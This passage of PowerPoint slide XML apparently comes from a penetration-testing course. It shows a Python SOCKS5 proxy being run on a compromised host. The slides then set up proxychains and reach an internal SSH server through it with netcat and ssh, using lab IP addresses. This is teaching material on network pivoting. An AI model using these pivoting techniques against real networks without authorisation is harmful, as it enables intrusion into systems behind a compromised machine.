              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  -h, --help                Show this help message and exit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  -v, --version             Show program's version number and exit.</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-H HOST, --host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HOST</a:t>
            </a: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Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> address to listen (default 0.0.0.0).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  -P PORT, --port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to listen (default 1080).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  -A METHOD, --auth METHOD  Authentication method (default 0).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                            Possible values: 0 (no auth), 2 (username/password auth)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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2F5AA0D1-4212-493C-9438-7B92BA8AA610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="48782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can run the proxy with the default options:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3E7DA1-C8B3-44E3-8F0F-07F6C285F584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752593" y="5424707"/>
            <a:ext cx="9372047" cy="4308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100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>~/asyncio-socks-server$ python my_socks5_proxy.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2021-12-01 22:41:37 +0000 | INFO     | Server launched on ('0.0.0.0', 1080)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB4AB674-BC3D-4566-A7D2-125F76A16FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32805729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88067" y="1842287"/>
            <a:ext cx="1020584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to utilize the SOCKS proxy we launched, we need to use a proxy client that supports SOCKS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>One such program is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>proxychains-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, and it’s already installed in Kali Linux.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make sure you have the configuration set to connect to the compromised server and port.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2482C708-A96C-4EBF-B86C-82D8CE6932DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773206" y="3398116"/>
            <a:ext cx="9372047" cy="4308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tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proxychains4.conf </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socks5 172.16.238.100 1080</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0D96C9-B65E-4D5A-BE86-6BF12F016057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4259696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47962" y="3553473"/>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 connection. We will now try to run proxychains with any program we want to connect with (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2482C708-A96C-4EBF-B86C-82D8CE6932DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1717059" y="4335271"/>
            <a:ext cx="9372047" cy="161582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100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ proxychains4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</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vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.11 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[proxychains] config file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>found</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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proxychains4.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[proxychains] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>preloading</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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/lib/x86_64-linux-gnu/libproxychains.so.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[proxychains] DLL init: proxychains-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 4.15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[proxychains] Strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ...  172.16.238.100:1080  ...  172.16.238.11:22  ...  OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UNKNOWN) [172.16.238.11] 22 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) open : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Operation</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now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>progress</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ proxychains4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user@172.16.238.11's password:</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proxychains’s configuration is set up, we will check if a connection can be made without proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D83677-AB47-44B8-83EE-BB77D4E6CE19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805290" y="2647710"/>
            <a:ext cx="9372047" cy="76944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nc</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vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.11 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^C</a:t>
            </a:r>
          </a:p>
          <a:p>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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: connect to host 172.16.238.11 port 22: Connection timed out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00898F70-164C-40FB-8036-6C37C69ADD96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147961" y="6025010"/>
            <a:ext cx="10438449"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Nice! We’ve got connection through our SOCKS proxy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Note that we’re not limited to just SSH. We can connect to any host/port we want in the network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64315F51-64A8-4A90-8CA6-C6EF24C3C2BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1416436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SOCKS proxy (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D9CB18-6605-408F-AA2D-F2B74FED3652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147962" y="3553473"/>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 connection. We will now try to run proxychains with any program we want to connect with (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2482C708-A96C-4EBF-B86C-82D8CE6932DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1717059" y="4335271"/>
            <a:ext cx="9372047" cy="161582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100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ proxychains4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</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vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.11 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[proxychains] config file </a:t>
            </a:r>
            <a:r>
